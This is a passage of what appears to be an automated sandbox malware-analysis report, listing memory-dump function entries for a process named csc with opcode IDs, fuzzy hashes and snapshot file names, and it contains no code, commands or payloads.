                                                      • Instruction ID: 64a387c167562eca61fca4c5844dd803e0f9dbab56603d51908e6173a07111fb
                                                      • Opcode Fuzzy Hash: 5685e2e3ce0f22822646c9e784cc23c1de0808836b4f1f1dd515a5578037b12b
                                                      • Instruction Fuzzy Hash: 27010CB4E04249AFCB04DFA9D545AAEBBF4FF48304F10846AA955E7381EA74DA00CB91
                                                      Function 054761E5 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 091b1899423af0a14022fbd706e17366dae2ce991ec2079f30a9377803ce3b6b
                                                      • Instruction ID: 62eeedb966c96b1e5222f1b2ad56c3602a35477d317ff96dc174da4eedfe7718
                                                      • Opcode Fuzzy Hash: 091b1899423af0a14022fbd706e17366dae2ce991ec2079f30a9377803ce3b6b
                                                      • Instruction Fuzzy Hash: 8B014F71A1065DABDF04EFA9D845AEEBBF8EF48710F14405AF501A7380DB74EA01CB95
                                                      Function 0542A4B0 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76544505310b46b2b29fe01628161e3e3b18142120bf98a00506d4a4ae89f23d
                                                      • Instruction ID: 02d7a454d03098b94b47775fd763e3576b846846f174cc1e95cf6a49f774906c
                                                      • Opcode Fuzzy Hash: 76544505310b46b2b29fe01628161e3e3b18142120bf98a00506d4a4ae89f23d
                                                      • Instruction Fuzzy Hash: 92019A36110129ABCF129F85DD45EDE7F66FB4C754F058106FE1966220CA32D9B1EB81
                                                      Function 053D656A Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2aa40b515bea25218e13bb1721ed269f7288aae470b2d5d20ef493030875679c
                                                      • Instruction ID: 96ed667ad440dd55d5a401a9000938f7f70d89c7a4bee4417b1e10ac9b813454
                                                      • Opcode Fuzzy Hash: 2aa40b515bea25218e13bb1721ed269f7288aae470b2d5d20ef493030875679c
                                                      • Instruction Fuzzy Hash: 4201F471704684DFE726DB28DD0EFA677EABB40B80F480695F912CBAD1DBA8D4818124
                                                      Function 0539C0F0 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d4cce3248e0881ee6c4f916b1ee1d484be0af1d58f1597a35ad3bc0296b5276
                                                      • Instruction ID: e2ca736802794bb72e9accc76073c2af780eea444037165ca66e1a557a9439b2
                                                      • Opcode Fuzzy Hash: 7d4cce3248e0881ee6c4f916b1ee1d484be0af1d58f1597a35ad3bc0296b5276
                                                      • Instruction Fuzzy Hash: 5EF024B27042095BFB2896158C41F3333AAE7C0760F65902AEB098B6C1EAB4DC01C3A8
                                                      Function 05473749 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                      • Instruction ID: 229c835183ba32cc0f2943fd54cb4d4d6789a83cf2097142e57d79ee3f1b827c
                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                      • Instruction Fuzzy Hash: E7F04476A40208BFE711DB64CD41FDA77FCEB04710F000566B515D7190E670AA44DB90
                                                      Function 054755C9 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72072d2f621c11ab1b26fc35375154751c9ab3b63fb44eac08cb94b3c29e3882
                                                      • Instruction ID: db95cd7127beca72be980d246f517b96ef61ca7c7f3d3341488e84ce3b82b0e4
                                                      • Opcode Fuzzy Hash: 72072d2f621c11ab1b26fc35375154751c9ab3b63fb44eac08cb94b3c29e3882
                                                      • Instruction Fuzzy Hash: EAF04F74A1024CAFDB04EFA8D545ADEB7F4EF18300F10445AB905EB380EA74EA01CB54
                                                      Function 053A47FB Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d66e7283b82c69231f19c9006ed73b17a72a30ebb122ff4e293575ebb5e69ac0
                                                      • Instruction ID: 0b9ad64f6fba65a417592ebd3425f99ca5d1c1479d38fd7fa270289690c6197d
                                                      • Opcode Fuzzy Hash: d66e7283b82c69231f19c9006ed73b17a72a30ebb122ff4e293575ebb5e69ac0
                                                      • Instruction Fuzzy Hash: 96F090339166E49EDF33CB68E054F6177DDEB00620F08496AD45E87501D7E5E880C651
                                                      Function 0545F6C7 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d8499f7c04007078fb81cecec38dcde15771e3856fd88ba86fad41ec69c40d
                                                      • Instruction ID: 7df6d8d3f365254d0310db7343a4345f0e609038f7021494d38c4800a44fb66c
                                                      • Opcode Fuzzy Hash: b6d8499f7c04007078fb81cecec38dcde15771e3856fd88ba86fad41ec69c40d
                                                      • Instruction Fuzzy Hash: 6EF06271A14258EBDB04EFA9D449E9EB7F4EF48304F004499E901EB381EA74E901CB54
                                                      Function 05460115 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1172f9b41310ab655f3236c84c5f6b1b98d6fe0744bd5c75e6cccb8c270efdca
                                                      • Instruction ID: dd5a5cc9d9b4444cfde0c8bc3d403ce91c6cfd997aeb300e915f1198b1685827
                                                      • Opcode Fuzzy Hash: 1172f9b41310ab655f3236c84c5f6b1b98d6fe0744bd5c75e6cccb8c270efdca
                                                      • Instruction Fuzzy Hash: B7F027765296C106CF265B28649F7E26F65B741024F0A14CBE8A55B305C9758883C222
                                                      Function 053DC5ED Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c55a49848a9c46043b99d14a47b7db1271132616ead24dbf310af46f25f4b5b
                                                      • Instruction ID: 0009d811c3c25a7692c2a37075fc7ba3e06cf53bb1216ee7d2e705f1d844d39c
                                                      • Opcode Fuzzy Hash: 6c55a49848a9c46043b99d14a47b7db1271132616ead24dbf310af46f25f4b5b
                                                      • Instruction Fuzzy Hash: 4AF0BE739356589BD722D628E148B61F3F9AB056A0F1CB426E44687912C2A5CC80CA60
                                                      Function 053E2619 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction ID: 11f4114d0a8b9a931933c4fe5468d1ac253c99aa98fa13a2c75a3be6c86dfd81
                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction Fuzzy Hash: 15E0D8723406102BE7229F598CC4F4777AEEFC3B10F040479B5045F292C9E2DD0982A4
                                                      Function 0547547F Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c71984a9c807dedf663799404d4c19aca08784d460da88263864f360817eb1c9
                                                      • Instruction ID: a89e354acea66b4bbc3f7d869d19f1673b8754df830f87da018581a87af8a1f3
                                                      • Opcode Fuzzy Hash: c71984a9c807dedf663799404d4c19aca08784d460da88263864f360817eb1c9
                                                      • Instruction Fuzzy Hash: FCF08270B15248ABDB04EBA9D94AFDE77F4EF08704F100499E602EB3C0EA74ED018758
                                                      Function 054754DB Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e2a49afe8648cb21013eec30c215f1f25bc0fd61d204a90f2f9c53c62a836de3
                                                      • Instruction ID: 93c7562c5c4b6de57448b469fef49afde6c5c7508c46b66e14fd984b209bf896
                                                      • Opcode Fuzzy Hash: e2a49afe8648cb21013eec30c215f1f25bc0fd61d204a90f2f9c53c62a836de3
                                                      • Instruction Fuzzy Hash: B7F01270A1424CABDB04EBA9D55AEDE7BF5EF48704F540499A502EB2C1EA74ED018714
                                                      Function 0545F72E Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da6a2d7ab08b3bcf722c522cf0a65494e9fb884ad4a32dd29028d66e3b5e6efd
                                                      • Instruction ID: 234c2b3cbda1230e9ba46910d26c43ca76ab4656a16b79f64e4bfabbe7eade6c
                                                      • Opcode Fuzzy Hash: da6a2d7ab08b3bcf722c522cf0a65494e9fb884ad4a32dd29028d66e3b5e6efd
                                                      • Instruction Fuzzy Hash: 73F08271A14248ABDB04EBB9D55AE9E77F4EF08704F000499E602EB2C1E974E905C715
                                                      Function 054751CB Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a97678917050c4ce4f395abd06b727928f705ffd91cfbc38d1179b313a403785
                                                      • Instruction ID: ffb7b072e7bb4959612c32e231eade899140f90b3f9f7bb4ff0e198cee46d97b
                                                      • Opcode Fuzzy Hash: a97678917050c4ce4f395abd06b727928f705ffd91cfbc38d1179b313a403785
                                                      • Instruction Fuzzy Hash: 88F08270B1425CABDB08EBA8D94AEEE77F4EF04704F040899B901EB2C0EA74E901CB54
                                                      Function 0541D070 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                      • Instruction ID: a911f8ba3ea5370584b34b1b6a0e1a37898d7cd0d03d3a9b5753157f4095a287
                                                      • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                      • Instruction Fuzzy Hash: BDF0EC3360462467C231A9598C05F97FB9CDBD5B70F10031ABA14971D0DA709901C7D5
                                                      Function 05475341 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5949ce19c6a4a1d7579ec6f692b646a67d62e702e249453ee87ea55a1c39da02
                                                      • Instruction ID: 9f4e944b0c29f8d4a42952d932e8cb750a722b54204ee3dc13d2a64a5f986eaf
                                                      • Opcode Fuzzy Hash: 5949ce19c6a4a1d7579ec6f692b646a67d62e702e249453ee87ea55a1c39da02
                                                      • Instruction Fuzzy Hash: 34F08970A14248ABDF04DBA9E585DDE77F8EF49204F500499A502EB2D0E974D9008714
                                                      Function 053D55C0 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                      • Instruction ID: db92e179fb3463646516b24e33399d884d660ec0222f68fe823489d22fb92bcc
                                                      • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                      • Instruction Fuzzy Hash: ADE0E533154614ABC6225A06E804F53FB6AFF507F0F104516B55A1799087B0AC11CAE4
                                                      Function 053A0710 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: 93d23adf6c777e10cf5b1a3eecf183022d314495af7b8e9f5d82dc2bb33fc9f6
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction Fuzzy Hash: B9F0E53A3083409BDB1ADF25C048AE57BA9FB41360F000459ED428B311D772E981CB51
                                                      Function 054737B6 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                      • Instruction ID: 12081b24ab9fdb1450f93ad39dcafdb0752be7035852a089e68fcccb6358deae
                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                      • Instruction Fuzzy Hash: EFE06DB2210614ABE764DB58CD05FE673ECFB00720F140699B116935D0DAB0BE40CA60
                                                      Function 053A25E0 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a1f0dc3fe05f252d58ef51d09325b8e0bd52e5d6ddd738e00a38e3b1799c1f7d
                                                      • Instruction ID: 27a53a6b2784a48ddbad258c0fd534963b0eaf3bff485c21205a05567dc488b4
                                                      • Opcode Fuzzy Hash: a1f0dc3fe05f252d58ef51d09325b8e0bd52e5d6ddd738e00a38e3b1799c1f7d
                                                      • Instruction Fuzzy Hash: B4E092332006949BC715BF29DD06F8B7B9AEB90360F114519B115571A0CB74AC10C784
                                                      Function 053A2050 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a45d11fd59afc34d54f7a652199cc57c2d6a14e094d3e8987a426f99c62bf2e
                                                      • Instruction ID: d021f669cff94c4a8d9c2169c5933cb9cacd3e763c8168d1ea314bb2a8b380e1
                                                      • Opcode Fuzzy Hash: 2a45d11fd59afc34d54f7a652199cc57c2d6a14e094d3e8987a426f99c62bf2e
                                                      • Instruction Fuzzy Hash: B7E0C2332005A06BC715FF5DDD01F8A779EEFA4360F110125F150876A0CBB4AC00C794
                                                      Function 0539B562 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                      • Instruction ID: b84f6d2f49e9c5fe52ca72d12df25d148433562468e3630206e49815fc5de245
                                                      • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                      • Instruction Fuzzy Hash: E3D05B31265660EFDB356F15FD09F82BA75AF80F50F0505147105564F085B1ED44C690
                                                      Function 053DE59C Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction ID: 056838b78d13de3df0428079b4b91dab93ea409a5cd588d78333ecd01f435d89
                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction Fuzzy Hash: 66D0A7322045205BD7719A1CFC04FD333D9BB48720F150859F004C7150C360AC41C644
                                                      Function 0539A0E3 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: 8f82a4e1bc8780100e14650a1c4974abf6560ecb5f803edee964b58dbd1c6466
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: D3D0127231607097DF2D96956914FA76A1AEB81A94F1A016D750A93D04C5158C42D6E0
                                                      Function 053DC700 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: d703a2ff343a1f21d3e92a1e3676085c78ec068ba2f76c159a9da4bf443693fc
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: C4C08C33290648AFD712EFD8CD01F427BA9EB98B40F100421F3048BA70C671FC20EA84
                                                      Function 053C340D Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                      • Instruction ID: 123674e22edea22ed06e1ec09825d17838b66c8b7177535a447bdacf71dd3223
                                                      • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                      • Instruction Fuzzy Hash: 00C08C702495806AEB2B5700C904F3C3A50BB00606F9409DCAB41298A1C3EAAC228318
                                                      Function 053A0750 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: 61a15d25ef5bd9d4453e774a76a11ebb8e95e256e7c055d1fdeab92eab50e2d1
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: 6AC04879B01A418FDF15DF2AD698F9977E8FB44744F150C90EA05CBB31E6A4E801DA10
                                                      Function 053E4650 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b028d78f93cb56848cfe6d0540e31bb3e93e5e961cf793ab917f3a8a996b99e9
                                                      • Instruction ID: b3437a9de4dfcf40c6ed0690efe2f5c288b8b853ed8fa434a1f0fb9e7aad1d57
                                                      • Opcode Fuzzy Hash: b028d78f93cb56848cfe6d0540e31bb3e93e5e961cf793ab917f3a8a996b99e9
                                                      • Instruction Fuzzy Hash: 20900266601500424944715C4844406A015D7E23013D5C115A1594560C8718C9659379
                                                      Function 053E3010 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6336c84dd70108a73e13b972f100ab7b99b4bda9d5736c0f211207d642c93d9e
                                                      • Instruction ID: 72de768a23345934dc9a1e1ff2b00cb3f58faeaa84a4ebd5c6da1c28f61d8bee
                                                      • Opcode Fuzzy Hash: 6336c84dd70108a73e13b972f100ab7b99b4bda9d5736c0f211207d642c93d9e
                                                      • Instruction Fuzzy Hash: 7090022620184442D944725C4844B0F8115C7E2202FD5C019A5196554CCA15C9655731
                                                      Function 053E3090 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d56f9fe96991247817c819dea87f1691b56d7c0ea0b565d8477d1e9d4e433f23
                                                      • Instruction ID: 8f06802ce5e3d445658257fe97cdf6a46bd3e64809d70e337693a49e9f059c93
                                                      • Opcode Fuzzy Hash: d56f9fe96991247817c819dea87f1691b56d7c0ea0b565d8477d1e9d4e433f23
                                                      • Instruction Fuzzy Hash: 6A90022624140802D944715C84547074016C7D1601F95C011A1064554D8716CA7567B1
                                                      Function 053E4340 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8bd75952190338d187917c8e04432922b114d6676c407acb29b5c023faf7429c
                                                      • Instruction ID: 527ef411f2cee4d5823be4570737a38c7fa2dad1059ba9ef34beca6f2cece2a5
                                                      • Opcode Fuzzy Hash: 8bd75952190338d187917c8e04432922b114d6676c407acb29b5c023faf7429c
                                                      • Instruction Fuzzy Hash: BE900236605800129944715C48C45468015D7E1301B95C011E1464554C8B14CA665371
                                                      Function 053E2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
